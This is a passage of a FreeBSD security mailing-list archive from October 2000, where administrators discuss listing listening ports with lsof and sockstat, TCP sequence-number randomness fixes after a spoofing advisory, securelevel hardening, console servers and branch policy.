Bryan Cc: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: <39D93044.8B0C4E69@ursine.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [in reply to Michael Bryan , 02/10/00] > If any port has a listener on it, as an admin you'd better know what that > listener is This shell script should be in the base ;) lsof -i | grep LISTEN | awk '{ print $1 "("$3") " $9} ' | sort | uniq Don't recall where I got it from, some Linux site I believe... -- "You might feel like you're melting and want to roll around on the ground, or maybe thats just me." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 5:29:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65]) by hub.freebsd.org (Postfix) with ESMTP id 9A15837B66C for ; Fri, 6 Oct 2000 05:29:39 -0700 (PDT) Received: (from ru@localhost) by whale.sunbay.crimea.ua (8.11.0/8.11.0) id e96CT6R92393; Fri, 6 Oct 2000 15:29:06 +0300 (EEST) (envelope-from ru) Date: Fri, 6 Oct 2000 15:29:06 +0300 From: Ruslan Ermilov To: Fernando Schapachnik Cc: security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Message-ID: <20001006152906.A90221@sunbay.com> Mail-Followup-To: Fernando Schapachnik , security@FreeBSD.ORG References: <200010061212.JAA83234@ns1.via-net-works.net.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010061212.JAA83234@ns1.via-net-works.net.ar>; from fpscha@ns1.via-net-works.net.ar on Fri, Oct 06, 2000 at 09:12:54AM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Oct 06, 2000 at 09:12:54AM -0300, Fernando Schapachnik wrote: > Many of you may have read this. > > It states that 4.1 is vulnerable, but doesn't mention 4.1.1. It also > provides URL to patches that are not accesible. Somebody has more > info? > kris 2000/09/28 18:37:19 PDT Modified files: sys/netinet tcp_seq.h tcp_subr.c Log: Use stronger random number generation for TCP_ISSINCR and tcp_iss. Reviewed by: peter, jlemon Revision Changes Path 1.12 +2 -2 src/sys/netinet/tcp_seq.h 1.81 +2 -2 src/sys/netinet/tcp_subr.c kris 2000/09/29 01:48:45 PDT Modified files: (Branch: RELENG_4) sys/netinet tcp_seq.h tcp_subr.c Log: MFC: Use stronger randomness for TCP_ISSINCR and tcp_iss Revision Changes Path 1.11.2.1 +2 -2 src/sys/netinet/tcp_seq.h 1.73.2.5 +2 -2 src/sys/netinet/tcp_subr.c kris 2000/09/29 01:49:56 PDT Modified files: (Branch: RELENG_3) sys/netinet tcp_seq.h tcp_subr.c Log: MFC: Use stronger randomness for TCP_ISSINCR and tcp_iss Revision Changes Path 1.8.4.2 +2 -2 src/sys/netinet/tcp_seq.h 1.49.2.6 +2 -2 src/sys/netinet/tcp_subr.c -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 5:37:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from xkis.kis.ru (xkis.kis.ru [195.98.32.200]) by hub.freebsd.org (Postfix) with ESMTP id 5F12737B502 for ; Fri, 6 Oct 2000 05:37:50 -0700 (PDT) Received: from localhost (dv@localhost) by xkis.kis.ru (8.9.3/8.9.3) with SMTP id QAA10036; Fri, 6 Oct 2000 16:37:37 +0400 (MSD) Date: Fri, 6 Oct 2000 16:37:37 +0400 (MSD) From: Dmitry Valdov X-Sender: dv@xkis.kis.ru To: Ruslan Ermilov Cc: Fernando Schapachnik , security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) In-Reply-To: <20001006152906.A90221@sunbay.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! And how about 2.x branch? Dmitry. On Fri, 6 Oct 2000, Ruslan Ermilov wrote: > Date: Fri, 6 Oct 2000 15:29:06 +0300 > From: Ruslan Ermilov > To: Fernando Schapachnik > Cc: security@FreeBSD.ORG > Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) > > On Fri, Oct 06, 2000 at 09:12:54AM -0300, Fernando Schapachnik wrote: > > Many of you may have read this. > > > > It states that 4.1 is vulnerable, but doesn't mention 4.1.1. It also > > provides URL to patches that are not accesible. Somebody has more > > info? > > > kris 2000/09/28 18:37:19 PDT > > Modified files: > sys/netinet tcp_seq.h tcp_subr.c > Log: > Use stronger random number generation for TCP_ISSINCR and tcp_iss. > > Reviewed by: peter, jlemon > > Revision Changes Path > 1.12 +2 -2 src/sys/netinet/tcp_seq.h > 1.81 +2 -2 src/sys/netinet/tcp_subr.c > > > kris 2000/09/29 01:48:45 PDT > > Modified files: (Branch: RELENG_4) > sys/netinet tcp_seq.h tcp_subr.c > Log: > MFC: Use stronger randomness for TCP_ISSINCR and tcp_iss > > Revision Changes Path > 1.11.2.1 +2 -2 src/sys/netinet/tcp_seq.h > 1.73.2.5 +2 -2 src/sys/netinet/tcp_subr.c > > > kris 2000/09/29 01:49:56 PDT > > Modified files: (Branch: RELENG_3) > sys/netinet tcp_seq.h tcp_subr.c > Log: > MFC: Use stronger randomness for TCP_ISSINCR and tcp_iss > > Revision Changes Path > 1.8.4.2 +2 -2 src/sys/netinet/tcp_seq.h > 1.49.2.6 +2 -2 src/sys/netinet/tcp_subr.c > > -- > Ruslan Ermilov Oracle Developer/DBA, > ru@sunbay.com Sunbay Software AG, > ru@FreeBSD.org FreeBSD committer, > +380.652.512.251 Simferopol, Ukraine > > http://www.FreeBSD.org The Power To Serve > http://www.oracle.com Enabling The Information Age > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 5:40:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentinel.office1.bg (sentinel.office1.bg [195.24.48.182]) by hub.freebsd.org (Postfix) with SMTP id 7FC3537B502 for ; Fri, 6 Oct 2000 05:40:38 -0700 (PDT) Received: (qmail 5890 invoked by uid 1001); 6 Oct 2000 12:33:43 -0000 Date: Fri, 6 Oct 2000 15:33:43 +0300 From: Peter Pentchev To: Walter Hop Cc: Michael Bryan , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf Message-ID: <20001006153343.B232@ringwraith.office1.bg> References: <39D93044.8B0C4E69@ursine.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from walter@skydancer.nl on Tue, Oct 03, 2000 at 03:40:54AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 03:40:54AM +0200, Walter Hop wrote: > [in reply to Michael Bryan , 02/10/00] > > > If any port has a listener on it, as an admin you'd better know what that > > listener is > > This shell script should be in the base ;) > > lsof -i | grep LISTEN | awk '{ print $1 "("$3") " $9} ' | sort | uniq > > Don't recall where I got it from, some Linux site I believe... And to paraphrase an earlier comment by DES, "Funny way to say sockstat | fgrep '*.*'" :) G'luck, Peter -- This would easier understand fewer had omitted. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 6: 4:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 371EE37B66D for ; Fri, 6 Oct 2000 06:04:13 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA19360; Fri, 6 Oct 2000 06:03:38 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda19358; Fri Oct 6 06:03:24 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id e96D3O048860; Fri, 6 Oct 2000 06:03:24 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdm48857; Fri Oct 6 06:02:46 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e96D2k345593; Fri, 6 Oct 2000 06:02:46 -0700 (PDT) Message-Id: <200010061302.e96D2k345593@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdX45589; Fri Oct 6 06:01:59 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: Hank Leininger Cc: freebsd-security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) In-reply-to: Your message of "Thu, 05 Oct 2000 02:23:42 EDT." <200010050623.CAA05646@mailer.progressive-comp.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 06 Oct 2000 06:01:59 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200010050623.CAA05646@mailer.progressive-comp.com>, Hank Leininger writes: > I've a feeling I'm (re)stating the obvious, but IMHO securelevels can't > really permanently preserve a system's known-good state in the face of root > compromise unless literally everything you'd ever access w/o securelevels > raised, is fully protected when they are (in which case you'll effectively > have everything interesting RO -- just set the RO jumper on the drive while > you're at it). Otherwise there will always(?) be some extra-mile way to > circumvent them. Of course we can devise countermeasures ad-nauseum -- for > instance, set all dirs in root's path to schg and only set sappnd on the > "last" one, and never change the order (silly). Or from every directory > "higher" in the path than a path'ed command, create a symlink to the right > place (unspeakably ugly, but works ;) Though you'll still have the 'sl', > 'ls-l', etc trojan possibilities either way. I think your first point is the only solution -- every R/O file would need the schg flag. Some co-workers and I had discussed this very issue about 2-3 years ago. The only solution we could arrive at was to burn the O/S onto a CDROM or set the R/O jumper on the drive, both of which would be administrative nightmares when the team administering the system is a ferry or helijet ride away, making managing such a system a very expensive proposition. Wouldn't setting schg on every binary and every config file on the system and running at securelevel 2 be equally effective? Then again there's the possibility of a bug in the system that would allow any attacker to reduce the securelevel. So once again were faced with your first point as the only solution. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 6:24:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 5FC6037B66D for ; Fri, 6 Oct 2000 06:24:09 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id JAA64042; Fri, 6 Oct 2000 09:24:05 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Fri, 6 Oct 2000 09:24:05 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Cy Schubert - ITSD Open Systems Group Cc: Hank Leininger , freebsd-security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) In-Reply-To: <200010061302.e96D2k345593@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 6 Oct 2000, Cy Schubert - ITSD Open Systems Group wrote: > Wouldn't setting schg on every binary and every config file on the > system and running at securelevel 2 be equally effective? Then again > there's the possibility of a bug in the system that would allow any > attacker to reduce the securelevel. So once again were faced with your > first point as the only solution. You also have to set schg on directories, as recent changes in the kernel cause it to agressively search /boot and other locations for configuration files that may not exist by default. Either you need to create all of them and schg them, or schg the directories to prevent the creation of these files. The agressiveness of the kernel in searching out files, especially loadable kernel modules, these days is quite astounding, and probably one strong reason when schg on files will now never be sufficient. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 6:29:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 177E137B66C for ; Fri, 6 Oct 2000 06:29:43 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA19413; Fri, 6 Oct 2000 06:29:39 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda19411; Fri Oct 6 06:29:36 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id e96DTW848995; Fri, 6 Oct 2000 06:29:32 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdn48993; Fri Oct 6 06:28:47 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e96DSkN45703; Fri, 6 Oct 2000 06:28:46 -0700 (PDT) Message-Id: <200010061328.e96DSkN45703@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdF45699; Fri Oct 6 06:28:33 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: Carroll Kong Cc: dima@unixfreak.org, "Jeffrey J. Mountin" , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) In-reply-to: Your message of "Thu, 05 Oct 2000 09:12:05 CDT." <4.2.2.20001005090906.0639d560@email.eden.rutgers.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 06 Oct 2000 06:28:33 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.2.2.20001005090906.0639d560@email.eden.rutgers.edu>, Carroll Kong writes: > Not sure if this is just extending the problem, but if it is going to be a > reboot box, why not create a special freebsd box that uses an octopus > 8-serial port card (for multiple machines) and null modem cables to hook > into these "secured" boxes. Naturally we would have to treat this box as a > hardened box as well. (running only sshd and firewalled and cannot accept > console logging requests). > > I have heard (ok, sorry I did not test it yet), that the Boot Loader will > automatically call up the serial port -> console drivers. So this way you > COULD call a reboot and go into single user mode from your special freebsd > console box by using minicom! > > If the most part of the annoyance is physical access, it is somewhat > eliminated by my console idea. Passwords would be secured over the serial > port (clear text, but no where to broadcast to), unless someone was > physically tapping, but if he got that far to tap, you are dead meat > anyway. I should get a null modem in my house to test for the "bootloader > showing up in console" bit. If you REALLY want full console access like to > the BIOS, there is the netweasel. > > So what do you think? Please respond if there are any flaws in this idea? We currently do a form of this on our raised floor, except that the console server does allow console logins -- the purpose of this box is twofold, remote access to the console via encrypted Kerberos sessions and the reduction of consoles littering our computer room. In our Vancouver datacentre we will be implementing, on 14 OCT, a similar arrangement but we will have two console servers, one Sun and one FreeBSD (for infrastructure boxes we scrape together whatever we can), both of which will serve each other as console servers, reducing our need to travel to Vancouver to possibly twice a year (hopefully). Physical access will be severely limited. As for hardware and software we use conserver (also in ports) and Cyclades cards in our FreeBSD and Linux console servers and Aurora cards in our Solaris console servers. The console servers use IPF for firewalls and only allow a subset of Kerberos services not running on the ports assigned to Kerberos. Solaris upgrades are currently done by jumpstart and FreeBSD upgrades would be done using make buildworld, so no CDROMS would need to be loaded local to the machine being upgraded. I haven't heard of netweasel before. Where can I find out more about it? Our original thoughts on BIOS access were to have a contractor on call for situations that would require physical access to the box, e.g. hit the power switch, BIOS access to the FreeBSD console server, or to escort a CE into the room. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 6:30:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from kendra.ne.mediaone.net (kendra.ne.mediaone.net [24.218.227.234]) by hub.freebsd.org (Postfix) with ESMTP id 20B8C37B66D for ; Fri, 6 Oct 2000 06:30:44 -0700 (PDT) Received: from xena (xena.hh.kew.com [192.168.203.148]) by kendra.ne.mediaone.net (Postfix) with SMTP id 327638C18 for ; Fri, 6 Oct 2000 09:30:43 -0400 (EDT) Message-ID: <002101c02f99$a04b6010$94cba8c0@hh.kew.com> From: "Drew Derbyshire" To: References: <39D93044.8B0C4E69@ursine.com> <20001006153343.B232@ringwraith.office1.bg> Subject: sockstat (was Re: cvs commit: src/etc inetd.conf) Date: Fri, 6 Oct 2000 09:30:43 -0400 Organization: Kendra Electronic Wonderworks, Stoneham, MA 02180 (http://www.kew.com) MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > And to paraphrase an earlier comment by DES, > "Funny way to say sockstat | fgrep '*.*'" :) Urp! sockstat seems to truncate port numbers on the FOREIGN ADDRESS under 4.1 release ... USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS postfix smtpd 44199 4 tcp4 *.25 *.* root sshd 44004 4 tcp4 192.168.203.135.22 192.168.203.148.13 socks socks5 43989 5 tcp4 192.168.203.135.10 *.* socks socks5 43989 6 tcp4 192.168.203.135.10 192.168.203.145.10 socks socks5 43989 7 tcp4 24.218.227.234.311 205.188.6.205.5190 Looking at netstat for the ssh connection: tcp4 0 36 192.168.203.135.22 192.168.203.148.1302 ESTABLISHED To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 7: 0: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id EB68637B502 for ; Fri, 6 Oct 2000 07:00:06 -0700 (PDT) Received: from ophelia.nectar.com (ophelia.nectar.com [10.5.5.2]) by gw.nectar.com (Postfix) with ESMTP id E33D21925E; Fri, 6 Oct 2000 09:00:05 -0500 (CDT) Received: (from nectar@localhost) by ophelia.nectar.com (8.9.3/8.9.3) id JAA01468; Fri, 6 Oct 2000 09:01:38 -0500 (CDT) (envelope-from nectar@spawn.nectar.com) Date: Fri, 6 Oct 2000 09:01:38 -0500 From: "Jacques A. Vidrine" To: Brett Glass Cc: Warner Losh , security@freebsd.org Subject: Re: Stable branch Message-ID: <20001006090138.B1410@ophelia.nectar.com> References: <4.3.2.7.2.20001005105420.04a7b540@localhost> <20001004220906.D50210@dragon.nuxi.com> <200010051830.MAA01024@harmony.village.org> <4.3.2.7.2.20001005173257.048b9f00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001005173257.048b9f00@localhost>; from brett@lariat.org on Thu, Oct 05, 2000 at 05:36:56PM -0600 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [Dropped freebsd-developers, since it isn't an open list. Unfortunately, this doesn't really belong on freebsd-security either, but I don't care to move it now.] On Thu, Oct 05, 2000 at 05:36:56PM -0600, Brett Glass wrote: > Personally, I would equate "-SOLID" with "suitable for production > machines" whereas -STABLE would be "OK for application developers > and eager/early adopters but still settling down to the confidence > level of -SOLID." > > Which might imply setting things up so that the -STABLE branch > becomes -SOLID after, say, a good .2 release. Two ideas that are related only by the fact that I am skeptical of the feasibility of yet another branch maintained by our volunteers: 1. A -SOLID or -BUGFIX branch sounds to me like a business opportunity to me. 2. I wonder about the feasibility of another tag on the -STABLE branch that follows behind RELENG_4. It may be easier to identify the last-known-excellent point on -STABLE than to maintain another branch. I should also note that I, personally, think that productions systems should run -RELEASE, plus locally applied hot-fixes. Yes, I realize that many shops may not have the expertise to do this. See (1). -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 7: 1:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentinel.office1.bg (sentinel.office1.bg [195.24.48.182]) by hub.freebsd.org (Postfix) with SMTP id B628537B502 for ; Fri, 6 Oct 2000 07:01:41 -0700 (PDT) Received: (qmail 6609 invoked by uid 1001); 6 Oct 2000 14:00:34 -0000 Date: Fri, 6 Oct 2000 17:00:34 +0300 From: Peter Pentchev To: Drew Derbyshire Cc: security@FreeBSD.ORG Subject: Re: sockstat (was Re: cvs commit: src/etc inetd.conf) Message-ID: <20001006170034.D232@ringwraith.office1.bg> References: <39D93044.8B0C4E69@ursine.com> <20001006153343.B232@ringwraith.office1.bg> <002101c02f99$a04b6010$94cba8c0@hh.kew.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <002101c02f99$a04b6010$94cba8c0@hh.kew.com>; from software@kew.com on Fri, Oct 06, 2000 at 09:30:43AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Oct 06, 2000 at 09:30:43AM -0400, Drew Derbyshire wrote: > > And to paraphrase an earlier comment by DES, > > "Funny way to say sockstat | fgrep '*.*'" :) > > Urp! > > sockstat seems to truncate port numbers on the FOREIGN ADDRESS under 4.1 > release ... Almost true - sockstat trims *both* local and foreign addresses to 20 chars each. However, in the case discussed, the issue was listening ports, which are in most cases bound to '*.portno' locally and always show '*.*' as foreign address. [3 minutes of source browsing] Uhm.. correction :) sockstat trims local and foreign addresses to 20 chars each, but netstat (which sockstat invokes), when invoked with -Aan (which is how sockstat invokes it), trims local and foreign addresses to 18 chars each to fit all the info on one line :( So the problem is with netstat, or rather with sockstat's usage of -A to get the socket control block address, to link it with fstat's output later. G'luck, Peter -- .siht ekil ti gnidaer eb d'uoy ,werbeH ni erew ecnetnes siht fI To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 8:54:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id E3D9537B503 for ; Fri, 6 Oct 2000 08:54:53 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hZpi-0007zV-00; Fri, 06 Oct 2000 17:54:50 +0200 Date: Fri, 6 Oct 2000 17:54:50 +0200 (IST) From: Roman Shterenzon To: "Jacques A. Vidrine" Cc: security@freebsd.org Subject: Re: Stable branch In-Reply-To: <20001006090138.B1410@ophelia.nectar.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 6 Oct 2000, Jacques A. Vidrine wrote: ..snipped.. > 1. A -SOLID or -BUGFIX branch sounds to me like a business > opportunity to me. > > 2. I wonder about the feasibility of another tag on the -STABLE > branch that follows behind RELENG_4. It may be easier to > identify the last-known-excellent point on -STABLE than to > maintain another branch. > > I should also note that I, personally, think that productions systems > should run -RELEASE, plus locally applied hot-fixes. Yes, I realize > that many shops may not have the expertise to do this. See (1). I've to disagree with you. I think that the errata should be maintained more aggressively, noting all the bugfixes that may disturb a normal operation, and provide link to the fixes as separate diff files. Then, it's trivial task to write a perl (or even shell) script which will: 0) say that sources are needed if they're not there 1) download the latest errata 2) interactively ask about what fixes to apply 3) download relevant fixes 4) apply the fixes 5) rebuild what is needed to be rebuilt and instal 6) reboot if the kernel was modified (perhaps some flag must be set in errata to trigger a reboot) As I already said, there's no need for separate branch, it will make merging even more difficult. And btw, STABLE is *stable* most of the time :) --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 10:13:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 602BD37B503 for ; Fri, 6 Oct 2000 10:13:47 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e96HDiH03677; Fri, 6 Oct 2000 11:13:45 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA09674; Fri, 6 Oct 2000 11:13:44 -0600 (MDT) Message-Id: <200010061713.LAA09674@harmony.village.org> To: Dmitry Valdov Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Cc: Ruslan Ermilov , Fernando Schapachnik , security@FreeBSD.ORG In-reply-to: Your message of "Fri, 06 Oct 2000 16:37:37 +0400." References: Date: Fri, 06 Oct 2000 11:13:44 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Dmitry Valdov writes: : And how about 2.x branch? I don't think anybody has backported it yet. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 10:37:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id C3C8637B66C for ; Fri, 6 Oct 2000 10:37:12 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e96Have11156; Fri, 6 Oct 2000 10:36:57 -0700 (PDT) Date: Fri, 6 Oct 2000 10:36:57 -0700 From: Alfred Perlstein To: Warner Losh Cc: Dmitry Valdov , Ruslan Ermilov , Fernando Schapachnik , security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Message-ID: <20001006103657.D27736@fw.wintelcom.net> References: <200010061713.LAA09674@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <200010061713.LAA09674@harmony.village.org>; from imp@village.org on Fri, Oct 06, 2000 at 11:13:44AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Warner Losh [001006 10:15] wrote: > In message Dmitry Valdov writes: > : And how about 2.x branch? > > I don't think anybody has backported it yet. I'm on it. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 11:18:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 145AA37B502 for ; Fri, 6 Oct 2000 11:18:56 -0700 (PDT) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id PAA43096 for security@freebsd.org; Fri, 6 Oct 2000 15:20:58 -0300 (ART) From: Fernando Schapachnik Message-Id: <200010061820.PAA43096@ns1.via-net-works.net.ar> Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) To: security@freebsd.org Date: Fri, 6 Oct 2000 15:20:58 -0300 (ART) Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Have any of you been able to download patches? The URL is not accesible and there is nothing in the ERRATA file either. Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 11:24:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by 